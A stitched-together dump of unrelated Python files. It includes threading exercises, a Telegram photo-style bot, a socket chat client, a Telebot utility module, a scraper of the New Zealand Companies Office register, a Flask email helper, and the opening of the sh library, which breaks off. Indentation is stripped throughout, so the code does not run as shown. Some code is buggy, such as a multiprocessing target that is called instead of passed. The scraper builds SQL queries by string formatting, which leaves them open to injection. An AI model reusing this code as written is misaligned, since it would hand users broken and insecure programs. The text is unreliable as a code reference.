#not first time enter, means there are players whose locked
#by can_enter condition, need to release them before starting new round
for i in range(0,L):
leader_wait[i] = Semaphore(0)
for i in range(0,F):
follower_wait[i] = Semaphore(0)
def end_music(music):
global can_enter
print ("** Band leader stopped playing ",music," **")
def band_leader():
global can_enter
global init
global can_dance
for music in itertools.cycle(['waltz', 'tango', 'foxtrot']):
mutex.acquire()
startmusic(music)
start = time.time()
mutex.release()
while (time.time()-start) <= 5:
if len(followers_on_floor) != 0 and len(leaders_on_floor) != 0:
mutex.acquire()
if(len(followers_on_floor) != 0):
can_dance = True
lid = leaders_on_floor.popleft()
leader_wait[lid].release()
mutex.release()
#mutex.acquire()
can_enter = False
can_dance = False
#print ("stop")
#mutex.release()
while len(followers_line) != F or len(leaders_line) != L: #wait for everyone; also mark that no one can enter during this time
if (len(leaders_on_floor) == 0 and len(followers_on_floor) != 0):
if(can_enter == False):
mutex.acquire()
can_dance = False
fid = followers_on_floor.popleft()
follower_wait[fid].release()
mutex.release()
if (len(leaders_on_floor) != 0 and len(followers_on_floor) == 0):
if(can_enter == False):
can_dance = False
if(len(leaders_on_floor)!=0):
mutex.acquire()
lid = leaders_on_floor.popleft()
leader_wait[lid].release()
mutex.release()
pass
#It's guarranteed that at this point, there is no one on the field.
end_music(music)
init = False #set init to false after 1st time
#--------------------------------
#------players-------------------
def leader():
global can_dance
global can_enter
while True:
if(can_enter == True):
mutex.acquire()
lid = leaders_line.popleft()
#print ("Leader ",lid," leftline")
print ("Leader ",lid," entering floor")
leaders_on_floor.append(lid)
mutex.release()
leader_wait[lid].acquire()
if(can_dance == True):
mutex.acquire()
fid = followers_on_floor.popleft() #appears that append and popleft are thread safe. might not need this sema for protection...
print("Leader ",lid," and Follower ",fid," are dancing.")
follower_wait[fid].release()
mutex.release()
# if not returned due to poor luck, then dance
sleep(rng.random())
#-------
mutex.acquire()
print ("Leader ",lid," getting back in line.")
leaders_line.append(lid)
mutex.release()
def follower():
global can_enter
global followers_on_floor
global mutex
global rng
while True:
if (can_enter == True):
mutex.acquire()
fid = followers_line.popleft()
#print ("Follower ",fid," leftline")
print ("Follower ",fid," entering floor")
followers_on_floor.append(fid)
#print ("Follower ",fid," entered floor")
mutex.release()
follower_wait[fid].acquire()
if (can_dance == True):# if not returned due to poor luck, then dance
sleep(rng.random())
#-------
mutex.acquire()
print ("Follower ",fid," getting back in line.")
followers_line.append(fid)
mutex.release()
#--------------------------------
if __name__ == '__main__':
#everyone enters the ballroom
#init all leaders and followers
#no one can dance unless music starts
#Like a formal dance
#where music will not start until everyone has entered the ballroom
init_band = Thread(target = band_leader)
init_band.start()
for i in range(0,L):
lead = Thread(target=leader)
lead.start()
for i in range(0,F):
follow = Thread(target=follower)
follow.start()
init_band.join()
lead.join()
follow.join()
#start first music for everyone to dance
|
python_threads.py
|
#!/usr/bin/env python
import time
import threading
def ticker():
while 42:
print("Tick!")
time.sleep(1)
thread = threading.Thread(target=ticker)
thread.daemon = True
thread.start()
# Or using sublcassing:
class TickerThread(threading.Thread):
def run(self):
while 42:
print("Tick!")
time.sleep(1)
thread = TickerThread()
thread.start()
# ...
thread.join()
|
bot.py
|
import os, time
import logging
import threading
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, Update
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext, ConversationHandler
from PIL import Image, ImageOps
from dataclasses import dataclass
from methods import gan, nst
PORT = int(os.environ.get('PORT', 5000))
MODE, PHOTO, NST, GAN, GAN_STYLE = range(5)
# Tokens is saved on the Heroku. HerokuApp -> Settings -> Config Vars
TOKEN = os.environ.get('TG_TOKEN')
HEROKU_URL = os.environ.get('HEROKU_URL')
# Enable logging
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO
)
logger = logging.getLogger(__name__)
content_files = {} #dictionary of content files: userId -> file_name
listOfTasks = []
os.makedirs("outputs", exist_ok = True)
os.makedirs("inputs", exist_ok = True)
@dataclass
class StyleTask:
method: str
target: str
style: str
update: Update
def help(update: Update, context: CallbackContext):
update.message.reply_text(
'ФотоБот умеет переносить менять стили фотографии при помощи нейросетей.\n'
'Реализовано два метода: NST и GAN.\n'
'Для начала работы используйте команду /start\n'
'Для завершения работы - команду /cancel\n',
reply_markup = ReplyKeyboardRemove())
return
def start(update: Update, context: CallbackContext) -> int:
update.message.reply_text(
'Привет! Я ФотоБот. Я умею изменять стили фотографий.\n'
'Для начала отправь мне фото, которое нужно изменить.',
reply_markup = ReplyKeyboardRemove())
return PHOTO
def photo_content(update: Update, context: CallbackContext) -> int:
photo_file = update.message.photo[-1].get_file()
content_filename = f'inputs/{str(photo_file["file_unique_id"])}.jpg'
photo_file.download(content_filename)
content_files[update.message.chat_id] = content_filename #запоминаем файл привязанный к пользователю
reply_keyboard = [['NST', 'GAN']]
update.message.reply_text(
'Итак, контентное фото у нас есть! '
'Как будем переносить стиль? NST или GAN?',
reply_markup = ReplyKeyboardMarkup(reply_keyboard))
return MODE
def mode(update: Update, context: CallbackContext) -> int:
if(update.message.text == 'NEW'):
update.message.reply_text(
'Ok! Отправь мне новое фото контента',
reply_markup = ReplyKeyboardRemove())
return PHOTO
if(update.message.text == 'GAN'):
styles_keyboard = [['CUPHEAD', 'STARRY NIGHT', 'MOSAIC']]
update.message.reply_text(
'Замечательно! Дальше нам нужно выбрать один из трех стилей: ',
reply_markup = ReplyKeyboardMarkup(styles_keyboard))
return GAN
if(update.message.text == 'NST'):
update.message.reply_text(
'Супер! Тогда мне нужна еще картинка стиля...\n'
'Отправь еще одно фото, c которого будем копировать стиль',
reply_markup = ReplyKeyboardRemove(),
)
return NST
def run_style_transfer(update: Update, context: CallbackContext) -> int:
photo_file = update.message.photo[-1].get_file()
style_filename = f'inputs/{str(photo_file["file_unique_id"])}.jpg'
photo_file.download(style_filename)
update.message.reply_text(
'Отличный стиль, думаю получится что-то интересное.\n'
'Но NST не самый быстрый метод - придется немного подождать...')
listOfTasks.append(StyleTask("NST", content_files[update.message.chat_id], style_filename, update))
print('NST added task')
return show_task_added(update, len(listOfTasks))
def run_GAN_transfer(update: Update, context: CallbackContext) -> int:
update.message.reply_text(
f'Принято в работу, применяю стиль {update.message.text}',
reply_markup = ReplyKeyboardRemove())
listOfTasks.append(StyleTask("GAN", content_files[update.message.chat_id], update.message.text, update))
print('GAN added task')
return show_task_added(update, len(listOfTasks))
def send_result(update: Update, result_file, task_title):
update.message.reply_text(f'Готова задачка {task_title}!')
update.message.reply_photo(photo = open(result_file, "rb"))
update.message.reply_text('Шикарно же?!\n')
def show_task_added(update, num) -> int:
update.message.reply_text(f'Задача добавлена в очередь под номером {num}\n'
'Когда будет готово, я пришлю результат')
modes_keyboard = [['NST', 'GAN'],['NEW']]
update.message.reply_text(
'Можем добавить еще задач! Что будем делать дальше?\n'
'Продолжим "мучать" наше фото? (Выбери NST или GAN...)\n'
'Или попробуем на другой фотке? (Нажимай NEW...) ',
reply_markup = ReplyKeyboardMarkup(modes_keyboard))
return MODE
def cancel(update: Update, context: CallbackContext) -> int:
user = update.message.from_user
logger.info("User %s canceled the conversation.", user.first_name)
update.message.reply_text(
'Пока! Будет скучно - приходи еще...', reply_markup=ReplyKeyboardRemove())
return ConversationHandler.END
def run_tasks(queue):
while True:
if len(queue) > 0:
print('task found')
task = queue[0] #.pop(0)
if task.method == "GAN":
print('do gan')
styled_file = gan.apply_style(task.target, task.style)
else:
print('do nst')
styled_file = nst.transfer_style(task.target, task.style)
queue.pop(0)
send_result(task.update, styled_file, f'{task.method} ({task.style})')
else:
print('waiting for task')
time.sleep(1 if len(queue) > 0 else 10)
def main() -> None:
# Create the Updater and pass it your bot's token.
updater = Updater(TOKEN)
# Get the dispatcher to register handlers
dispatcher = updater.dispatcher
# Add conversation handler with the states MODE, PHOTO
conv_handler = ConversationHandler(
entry_points=[CommandHandler('start', start), CommandHandler('help', help)],
states = {
MODE: [MessageHandler(Filters.regex('^(NST|GAN|NEW)$'), mode)],
PHOTO: [MessageHandler(Filters.photo, photo_content)],
NST: [MessageHandler(Filters.photo, run_style_transfer)],
GAN: [MessageHandler(Filters.regex('^(CUPHEAD|STARRY NIGHT|MOSAIC)$'), run_GAN_transfer)]
},
fallbacks=[CommandHandler('cancel', cancel)],
)
dispatcher.add_handler(conv_handler)
updater.start_webhook(listen="0.0.0.0",
port=int(PORT),
url_path=TOKEN)
updater.bot.set_webhook(HEROKU_URL + TOKEN)
updater.idle()
if __name__ == '__main__':
threading.Thread(target=run_tasks, args = (listOfTasks,), daemon = True).start()
main()
|
client_console.py
|
import socket, threading
class Client():
def __init__(self):
self.cli_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.thread_send = threading.Thread(target = self.send)
self.thread_receive = threading.Thread(target = self.receive)
def StartClient(self):
HOST = 'localhost'
PORT = 5023
self.cli_sock.connect((HOST, PORT))
print('Connected to remote host...')
uname = input('Enter your name to enter the chat > ')
uname = uname.encode("UTF-8").strip()
self.cli_sock.send(uname)
self.thread_send.start()
self.thread_receive.start()
def send(self):
while True:
msg =input('\nMe: \n')
self.cli_sock.send(msg.encode("UTF-8").strip())
def receive(self):
while True:
sen_name = self.cli_sock.recv(1024).decode("UTF-8").strip()
data = self.cli_sock.recv(1024).decode("UTF-8").strip()
print('\n' + str(sen_name) + ' > ' + str(data)+'\n')
print("Me:")
if __name__ == "__main__":
client = Client()
client.StartClient()
|
multipor.py
|
# in window and apple application is the multiprocedd avariable
# but in linux is that not quite easy and everything looks different
import multiprocessing
import time
start = time.perf_counter() # reletive time when the computer opens
print(start)
def do_something():
print('start sleep')
time.sleep(1)
print('sleeping for 1s')
p1 = multiprocessing.Process(target=do_something())
p2 = multiprocessing.Process(target=do_something())
p1.start()
p2.start()
p1.join()
p2.join()
# do_something()
# do_something()
# do_something()
finish = time.perf_counter() # reletive time when the computer opens
print(f'finish the executing, using time: {round(finish - start,2)}')
|
util.py
|
# -*- coding: utf-8 -*-
import random
import re
import string
import sys
import threading
import traceback
import warnings
import functools
import six
from six import string_types
# Python3 queue support.
try:
import Queue
except ImportError:
import queue as Queue
import logging
try:
import PIL
from io import BytesIO
pil_imported = True
except:
pil_imported = False
logger = logging.getLogger('TeleBot')
thread_local = threading.local()
class WorkerThread(threading.Thread):
count = 0
def __init__(self, exception_callback=None, queue=None, name=None):
if not name:
name = "WorkerThread{0}".format(self.__class__.count + 1)
self.__class__.count += 1
if not queue:
queue = Queue.Queue()
threading.Thread.__init__(self, name=name)
self.queue = queue
self.daemon = True
self.received_task_event = threading.Event()
self.done_event = threading.Event()
self.exception_event = threading.Event()
self.continue_event = threading.Event()
self.exception_callback = exception_callback
self.exc_info = None
self._running = True
self.start()
def run(self):
while self._running:
try:
task, args, kwargs = self.queue.get(block=True, timeout=.5)
self.continue_event.clear()
self.received_task_event.clear()
self.done_event.clear()
self.exception_event.clear()
logger.debug("Received task")
self.received_task_event.set()
task(*args, **kwargs)
logger.debug("Task complete")
self.done_event.set()
except Queue.Empty:
pass
except Exception as e:
logger.error(type(e).__name__ + " occurred, args=" + str(e.args) + "\n" + traceback.format_exc())
self.exc_info = sys.exc_info()
self.exception_event.set()
if self.exception_callback:
self.exception_callback(self, self.exc_info)
self.continue_event.wait()
def put(self, task, *args, **kwargs):
self.queue.put((task, args, kwargs))
def raise_exceptions(self):
if self.exception_event.is_set():
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def clear_exceptions(self):
self.exception_event.clear()
self.continue_event.set()
def stop(self):
self._running = False
class ThreadPool:
def __init__(self, num_threads=2):
self.tasks = Queue.Queue()
self.workers = [WorkerThread(self.on_exception, self.tasks) for _ in range(num_threads)]
self.num_threads = num_threads
self.exception_event = threading.Event()
self.exc_info = None
def put(self, func, *args, **kwargs):
self.tasks.put((func, args, kwargs))
def on_exception(self, worker_thread, exc_info):
self.exc_info = exc_info
self.exception_event.set()
worker_thread.continue_event.set()
def raise_exceptions(self):
if self.exception_event.is_set():
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def clear_exceptions(self):
self.exception_event.clear()
def close(self):
for worker in self.workers:
worker.stop()
for worker in self.workers:
worker.join()
class AsyncTask:
def __init__(self, target, *args, **kwargs):
self.target = target
self.args = args
self.kwargs = kwargs
self.done = False
self.thread = threading.Thread(target=self._run)
self.thread.start()
def _run(self):
try:
self.result = self.target(*self.args, **self.kwargs)
except:
self.result = sys.exc_info()
self.done = True
def wait(self):
if not self.done:
self.thread.join()
if isinstance(self.result, BaseException):
six.reraise(self.result[0], self.result[1], self.result[2])
else:
return self.result
def async_dec():
def decorator(fn):
def wrapper(*args, **kwargs):
return AsyncTask(fn, *args, **kwargs)
return wrapper
return decorator
def is_string(var):
return isinstance(var, string_types)
def is_dict(var):
return isinstance(var, dict)
def is_bytes(var):
return isinstance(var, bytes)
def is_pil_image(var):
return pil_imported and isinstance(var, PIL.Image.Image)
def pil_image_to_file(image, extension='JPEG', quality='web_low'):
if pil_imported:
photoBuffer = BytesIO()
image.convert('RGB').save(photoBuffer, extension, quality=quality)
photoBuffer.seek(0)
return photoBuffer
else:
raise RuntimeError('PIL module is not imported')
def is_command(text):
"""
Checks if `text` is a command. Telegram chat commands start with the '/' character.
:param text: Text to check.
:return: True if `text` is a command, else False.
"""
if (text is None): return None
return text.startswith('/')
def extract_command(text):
"""
Extracts the command from `text` (minus the '/') if `text` is a command (see is_command).
If `text` is not a command, this function returns None.
Examples:
extract_command('/help'): 'help'
extract_command('/help@BotName'): 'help'
extract_command('/search black eyed peas'): 'search'
extract_command('Good day to you'): None
:param text: String to extract the command from
:return: the command if `text` is a command (according to is_command), else None.
"""
if (text is None): return None
return text.split()[0].split('@')[0][1:] if is_command(text) else None
def split_string(text, chars_per_string):
"""
Splits one string into multiple strings, with a maximum amount of `chars_per_string` characters per string.
This is very useful for splitting one giant message into multiples.
:param text: The text to split
:param chars_per_string: The number of characters per line the text is split into.
:return: The splitted text as a list of strings.
"""
return [text[i:i + chars_per_string] for i in range(0, len(text), chars_per_string)]
# CREDITS TO http://stackoverflow.com/questions/12317940#answer-12320352
def or_set(self):
self._set()
self.changed()
def or_clear(self):
self._clear()
self.changed()
def orify(e, changed_callback):
e._set = e.set
e._clear = e.clear
e.changed = changed_callback
e.set = lambda: or_set(e)
e.clear = lambda: or_clear(e)
def OrEvent(*events):
or_event = threading.Event()
def changed():
bools = [e.is_set() for e in events]
if any(bools):
or_event.set()
else:
or_event.clear()
def busy_wait():
while not or_event.is_set():
or_event._wait(3)
for e in events:
orify(e, changed)
or_event._wait = or_event.wait
or_event.wait = busy_wait
changed()
return or_event
def extract_arguments(text):
"""
Returns the argument after the command.
Examples:
extract_arguments("/get name"): 'name'
extract_arguments("/get"): ''
extract_arguments("/get@botName name"): 'name'
:param text: String to extract the arguments from a command
:return: the arguments if `text` is a command (according to is_command), else None.
"""
regexp = re.compile(r"/\w*(@\w*)*\s*([\s\S]*)",re.IGNORECASE)
result = regexp.match(text)
return result.group(2) if is_command(text) else None
def per_thread(key, construct_value, reset=False):
if reset or not hasattr(thread_local, key):
value = construct_value()
setattr(thread_local, key, value)
return getattr(thread_local, key)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
# https://stackoverflow.com/a/312464/9935473
for i in range(0, len(lst), n):
yield lst[i:i + n]
def generate_random_token():
return ''.join(random.sample(string.ascii_letters, 16))
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used."""
# https://stackoverflow.com/a/30253848/441814
@functools.wraps(func)
def new_func(*args, **kwargs):
warnings.simplefilter('always', DeprecationWarning) # turn off filter
warnings.warn("Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning,
stacklevel=2)
warnings.simplefilter('default', DeprecationWarning) # reset filter
return func(*args, **kwargs)
return new_func
|
index.py
|
#!/usr/bin/pypy3
#!/usr/bin/python3
import mysql.connector
import json
import cgi
from urllib.request import Request, urlopen
from datetime import datetime, timedelta
from threading import Thread
def commit(company_number, output, cursor, cnx):
# Commit to database
sql1 = "DELETE FROM nzcompaniesoffice WHERE company_number={};".format(company_number)
sql2 = "INSERT INTO nzcompaniesoffice VALUES({}, '{}', '{}');".format(company_number, output, str(datetime.now()))
cursor.execute(sql1)
cnx.commit()
cursor.execute(sql2)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def worker(html, string):
index = html.find(string)
if index == -1:
raise Exception('index not found:{}'.format(string))
return index + len(string)
def site(company_number):
#url = 'http://10.0.0.10/removed.html'
#url = 'https://projectapi.co.nz/demo.html'
url = 'https://app.companiesoffice.govt.nz/companies/app/ui/pages/companies/{}/detail?backurl=%2Fcompanies%2Fapp%2Fui%2Fpages%2Fcompanies%2F6842293'.format(company_number)
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
webpage = urlopen(req).read()
html = webpage.decode('utf-8').replace('\r', '').replace('\n', '')
# maincol
maincol = html[worker(html, 'id="maincol"'):]
# Catagories
panel1 = maincol[worker(maincol, 'class="pageContainer"'):]
panel2 = panel1[worker(panel1, 'class="pageContainer"'):]
panel3 = panel2[worker(panel2, 'class="pageContainer"'):]
panel4 = panel3[worker(panel3, 'class="pageContainer"'):]
panel5 = panel4[worker(panel4, 'class="pageContainer"'):]
panel6 = panel5[worker(panel5, 'class="pageContainer"'):]
panel7 = panel6[worker(panel6, 'class="pageContainer"'):]
panel7 = panel7[worker(panel7, 'class="pageContainer"'):]
panel1 = panel1[:worker(panel1, 'class="pageContainer"')]
panel2 = panel2[:worker(panel2, 'class="pageContainer"')]
panel3 = panel3[:worker(panel3, 'class="pageContainer"')]
panel4 = panel4[:worker(panel4, 'class="pageContainer"')]
panel5 = panel5[:worker(panel5, 'class="pageContainer"')]
panel6 = panel6[:worker(panel6, panel7)]
# Company Summary
_name = maincol[:worker(maincol, '<span class="entityIdentifier">')-len('<span class="entityIdentifier">')][::-1]
_name = _name[:worker(_name, '>')-len('>')][::-1].strip()
_nzbn = panel1[worker(panel1, 'for="nzbn">NZBN:</label>'):]
_nzbn = int(_nzbn[:worker(_nzbn, '</div>')-len('</div>')].strip())
_company_number = panel1[worker(panel1, 'for="companyNumber">Company number:</label>'):]
_company_number = int(_company_number[:worker(_company_number, '</div>')-len('</div>')].strip())
_incorporation_date = panel1[worker(panel1, 'for="incorporationDate">Incorporation Date:</label>'):]
_incorporation_date = _incorporation_date[:worker(_incorporation_date, '</div>')-len('</div>')].strip()
_company_status = panel1[worker(panel1, 'for="companyStatus">Company Status:</label>'):]
_company_status = _company_status[:worker(_company_status, '</div>')-len('</div>')].strip()
_entity_type = panel1[worker(panel1, 'for="entityType">Entity type:</label>'):]
_entity_type = _entity_type[:worker(_entity_type, '</div>')-len('</div>')].strip()
_constitution_filed = panel1[worker(panel1, 'for="constitutionFiled">Constitution filed:</label>'):]
_constitution_filed = _constitution_filed[:worker(_constitution_filed, '</div>')-len('</div>')].strip()
_constitution_filed = 'Yes' if 'Yes' in _constitution_filed else 'No'
try:
_ar_filing_month = panel1[worker(panel1, 'for="arFilingMonth">AR filing month:</label>'):]
_ar_filing_month = _ar_filing_month[:worker(_ar_filing_month, '<')-len('<')].split()[0].strip()
except:
_ar_filing_month = None
_ultimate_holding_company = panel1[worker(panel1, '<label id="ultimateHoldingCompany">Ultimate holding company'):].strip()
_ultimate_holding_company = _ultimate_holding_company[worker(_ultimate_holding_company, '</label>')+len('</label>'):].strip()
_ultimate_holding_company = _ultimate_holding_company[:worker(_ultimate_holding_company, '<')-len('<')].strip()
company_summary = {
'company_number':_company_number,
'nzbn':_nzbn,
'incorporation_date':_incorporation_date,
'company_status':_company_status,
'entity_type':_entity_type,
'constitution_filed':_constitution_filed,
'ar_filing_month':_ar_filing_month,
'ultimate_holding_company':_ultimate_holding_company,
'url':url.split('?')[0],
'date_retrieved':str(datetime.now().date())
}
# Company Directors
directors = []
while True:
try:
panel2 = panel2[worker(panel2, 'for="fullName">Full legal name:</label>'):]
_full_legal_name = panel2[:worker(panel2, '</div>')-len('</div>')].strip()
panel2 = panel2[worker(panel2, 'for="residentialAddress">Residential Address:</label>'):]
_residential_address = panel2[:worker(panel2, '</div>')-len('</div>')].strip()
panel2 = panel2[worker(panel2, 'for="appointmentDate">Appointment Date:</label>'):]
_appointed_date = panel2[:worker(panel2, '</div>')-len('</div>')].strip()
directors.append({
'full_legal_name':_full_legal_name,
'residential_address':_residential_address,
'appointed_date':_appointed_date
})
except:
break
# Company Shareholdings
panel3 = panel3[worker(panel3, '<label>Total Number of Shares:</label><span>'):]
_total_number_of_shares = int(panel3[:worker(panel3, '</span>')-len('</span>')].strip())
panel3 = panel3[worker(panel3, '<label>Extensive Shareholding:</label>'):]
_extensive_shareholding = 'Yes' if 'yes' in panel3[:worker(panel3, '</span>')-len('</span>')].strip() else 'no'
shareholdings = {
'total_number_of_shares':_total_number_of_shares,
'extensive_shareholding':_extensive_shareholding,
'allocation':[]
}
_shareholders = []
while True:
try:
panel3 = panel3[worker(panel3, '</span>:</label>'):]
_shareholders.append(panel3[:worker(panel3, '</span>:</label>')-len('</span>:</label>')])
except:
_shareholders.append(panel3)
break
for shareholder in _shareholders:
_shares = int(shareholder[:worker(shareholder, '<')-len('<')].strip())
_holders = []
while True:
try:
temp = shareholder[worker(shareholder, '<div class="labelValue col2">'):]
shareholder = temp[worker(temp, '<div class="labelValue col2">'):]
temp = temp[:worker(temp, '</div>')-len('</div>')].strip()
if temp[:2] == '<a':
temp = temp[worker(temp, '>'):]
temp = temp[:worker(temp, '</a>')-len('</a>')].strip()
_holders.append([
temp,
shareholder[:worker(shareholder, '</div>')-len('</div>')].strip()
])
except:
break
shareholdings['allocation'].append([_shares, _holders])
# Company Addresses
panel4 = panel4[worker(panel4, '<div class="addressLine">'):]
_registered_office_address = panel4[:worker(panel4, '</div>')-len('</div>')].strip()
panel4 = panel4[worker(panel4, '<div class="addressLine">'):]
_address_for_service = panel4[:worker(panel4, '</div>')-len('</div>')].strip()
try:
_website = maincol[worker(maincol, 'var website="'):]
_website = _website[:worker(_website, '"')-len('"')]
except:
_website = None
addresses = {
'registered_office_address':_registered_office_address,
'address_for_service':_address_for_service,
'website':_website
}
# Company PPSR
ppsr = {}
# Company NZBN (additional nzbn information)
try:
_industry = panel1[worker(panel1, 'for="businessClassification">Industry Classification(s):</label>'):]
_industry = _industry[worker(_industry, '<div>'):]
_industry = ' '.join(_industry[:worker(_industry, '</div>')-len('</div>')].strip().split(' ')[1:])
except:
_industry = ''
try:
_gst_number = panel6[worker(panel6, 'for="gstNumber">GST Number(s):</label>'):]
_gst_number = _gst_number[worker(_gst_number, 'class="nzbnDetails">'):]
_gst_number = _gst_number[:worker(_gst_number, '<')-len('<')].strip()
except:
_gst_number = ''
try:
_website = panel6[worker(panel6, 'for="website">Website(s):</label>'):]
if worker(_website, '<a href="') > worker(_website, '</div>'):
raise Exception('No data')
_website = _website[worker(_website, '<a href="'):]
_website = _website[:worker(_website, '"')-len('"')].strip()
except:
_website = ''
try:
_phone_number = panel6[worker(panel6, 'for="phone">Phone Number(s):</label>'):]
_phone_number = _phone_number[worker(_phone_number, '>'):]
_phone_number = _phone_number[:worker(_phone_number, '<')-len('<')].strip()
except:
_phone_number = ''
try:
_email_address = panel6[worker(panel6, 'for="email">Email Address(es):</label>'):]
if worker(_email_address, '<a href="') > worker(_email_address, '</div>'):
raise Exception('No data')
_email_address = _email_address[worker(_email_address, '<a href="'):]
_email_address = _email_address[:worker(_email_address, '<')-len('<')].strip().split(':')[1]
except:
_email_address = ''
try:
_trading_name = panel6[worker(panel6, 'for="tradingName">Trading Name(s):</label>'):]
_trading_name = _trading_name[worker(_trading_name, 'class="nzbnDetails">'):]
_trading_name = _trading_name[:worker(_trading_name, '<')-len('<')].strip()
except:
_trading_name = ''
try:
_trading_area = panel6[worker(panel6, 'for="tradingAreas">Trading Area(s):</label>'):]
_trading_area = _trading_area[worker(_trading_area, 'class="nzbnDetails">'):]
_trading_area = _trading_area[:worker(_trading_area, '<')-len('<')].strip()
except:
_trading_area = ''
try:
_abn = panel6[worker(panel6, 'for="ABNNumber">Australian Business Number (ABN):</label>'):]
_abn = _abn[worker(_abn, 'class="nzbnDetails">'):]
_abn = _abn[:worker(_abn, '<')-len('<')].strip()
except:
_abn = ''
nzbn = {
'gst_number':_gst_number if len(_gst_number)!=0 else 'Not Listed',
'website':_website if len(_website)!=0 else 'Not Listed',
'phone_number':_phone_number if len(_phone_number)!=0 else 'Not Listed',
'email_address':'Not Listed',
'trading_name':_trading_name if len(_trading_name)!=0 else 'Not Listed',
'trading_area':_trading_area if len(_trading_area)!=0 else 'Not Listed',
'industry':_industry if len(_industry)!=0 else 'Not Listed',
'abn':_abn if len(_abn)!=0 else 'Not Listed'
}
# Company Documents
documents = {}
# Output
output = {
'NAME':_name,
'INFO':{
'SUMMARY':company_summary,
'DIRECTORS':directors,
'SHAREHOLDINGS':shareholdings,
'ADDRESSES':addresses,
'PPSR':ppsr,
'NZBN':nzbn,
'DOCUMENTS':documents
},
'DATE':company_summary['date_retrieved']
}
return json.dumps(output)
def main():
form = cgi.FieldStorage()
try:
try:
company_number = int(form['company_number'].value)
except KeyError:
return {'error':'missing parameter'}
except ValueError:
return {'error':'Invalid company number: {}'.format(company_number)}
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM nzcompaniesoffice WHERE company_number={};".format(company_number)
cursor.execute(sql)
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=30)) > data[2]:
raise IndexError('item in database expired')
cache_results = data[1]
cursor.close()
cnx.close()
except IndexError:
cache_expired = True
try:
fetch_results = site(company_number)
except:
fetch_results = json.dumps({'error':'removed'})
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(company_number, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == "__main__":
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
email.py
|
# -*- coding: utf-8 -*-
_author_ = 'Pylar'
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] +' '+ subject,
sender=app.config['FLASKY_MAIL_SENDER'],recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
sh.py
|
"""
http://amoffat.github.io/sh/
"""
#===============================================================================
# Copyright (C) 2011-2015 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#===============================================================================
__version__ = "1.11"
__project_url__ = "https://github.com/amoffat/sh"
import platform
if "windows" in platform.system().lower():
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
import sys
IS_PY3 = sys.version_info[0] == 3
import traceback
import os
import re
from glob import glob as original_glob
import time
from types import ModuleType
from functools import partial
import inspect
from contextlib import contextmanager
from locale import getpreferredencoding
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
if IS_PY3:
from io import StringIO
from io import BytesIO as cStringIO
from queue import Queue, Empty
# for some reason, python 3.1 removed the builtin "callable", wtf
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from Queue import Queue, Empty
IS_OSX = platform.system() == "Darwin"
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = "sh"
import errno
import warnings
import pty
import termios
import signal
import gc
import select
import threading
import tty
import fcntl
import struct
import resource
from collections import deque
import logging
import weakref
# TODO remove with contexts in next version
def with_context_warning():
warnings.warn("""
with contexts are deprecated because they are not thread safe. they will be \
removed in the next version. use subcommands instead \
http://amoffat.github.io/sh/#sub-commands. see \
https://github.com/amoffat/sh/issues/195
""".strip(), stacklevel=3)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
_unicode_methods = set(dir(unicode()))
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
